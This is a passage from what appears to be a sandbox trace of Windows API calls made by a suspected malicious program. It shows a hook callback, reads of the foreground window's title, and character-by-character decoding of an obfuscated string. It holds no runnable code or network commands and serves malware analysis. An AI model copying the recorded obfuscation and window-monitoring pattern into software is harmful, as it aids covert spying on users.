dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.530] SysStringLen (param_1="Ac") returned 0x2 [0086.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Ac", cchWideChar=3, lpMultiByteStr=0xe570fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ac", lpUsedDefaultChar=0x0) returned 3 [0086.530] SetWindowTextA (hWnd=0x2036e, lpString="Ac") returned 1 [0086.530] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0086.530] GetFocus () returned 0x0 [0086.530] lstrlenA (lpString="Ac") returned 2 [0086.531] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe570fc) returned 0x1 [0086.531] IsWindow (hWnd=0x2036e) returned 1 [0086.531] IsWindow (hWnd=0x2036e) returned 1 [0086.531] IsWindow (hWnd=0x2036e) returned 1 [0086.531] IsWindow (hWnd=0x2036e) returned 1 [0086.531] GetFocus () returned 0x0 [0086.531] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0086.532] GetFocus () returned 0x0 [0086.532] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x3) returned 0x310bcd0 [0086.532] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x3, lParam=0x310bcd0) returned 0x2 [0086.532] GetFocus () returned 0x0 [0086.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0086.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0xe570fc, cchWideChar=3 | out: lpWideCharStr="Ac") returned 3 [0086.532] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.532] VarBstrCmp (bstrLeft="Ac", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.532] SetTimer (hWnd=0x20372, nIDEvent=0x20372, uElapse=0x64, lpTimerFunc=0x0) returned 0x20372 [0086.723] CallNextHookEx (hhk=0x900d9, nCode=0, wParam=0x1, lParam=0x28f51c) returned 0x0 [0086.723] KillTimer (hWnd=0x20372, uIDEvent=0x20372) returned 1 [0086.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.724] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.724] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.725] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.725] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.726] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.726] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.726] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.726] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.727] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.727] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.728] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.728] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.728] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.728] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.729] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.729] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.729] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.730] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.730] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.730] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.731] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.731] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.731] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.732] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.732] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.732] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.733] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.733] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.733] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.734] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.734] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.734] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.735] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.735] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.736] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.736] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.737] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.737] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.737] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.738] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.738] GetForegroundWindow () returned 0x10080 [0086.738] GetLastError () returned 0x0 [0086.738] SysStringLen (param_1=" ") returned 0xff [0086.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.738] SysStringLen (param_1=" ") returned 0xff [0086.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.739] GetWindowTextA (in: hWnd=0x10080, lpString=0xe577bc, nMaxCount=255 | out: lpString="") returned 0 [0086.739] GetLastError () returned 0x0 [0086.739] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.739] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="") returned 256 [0086.739] SysStringLen (param_1="") returned 0x2 [0086.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=3, lpMultiByteStr=0xe4a94c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 3 [0086.740] SetWindowTextA (hWnd=0x2036e, lpString="") returned 1 [0086.740] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0086.740] GetFocus () returned 0x0 [0086.740] lstrlenA (lpString="") returned 0 [0086.740] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe4a94c) returned 0x1 [0086.740] IsWindow (hWnd=0x2036e) returned 1 [0086.740] IsWindow (hWnd=0x2036e) returned 1 [0086.740] IsWindow (hWnd=0x2036e) returned 1 [0086.741] IsWindow (hWnd=0x2036e) returned 1 [0086.741] GetFocus () returned 0x0 [0086.741] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0086.741] GetFocus () returned 0x0 [0086.741] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1) returned 0x310bcd0 [0086.741] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x1, lParam=0x310bcd0) returned 0x0 [0086.742] GetFocus () returned 0x0 [0086.742] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.742] VarBstrCmp (bstrLeft=0x0, bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0086.743] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0086.743] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0086.744] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0086.744] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.745] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.745] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.746] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.746] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.747] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.747] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.748] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.748] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.749] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.749] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.750] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.750] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0086.750] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0086.751] VarCat (in: pvarLeft=0x28f1e8, 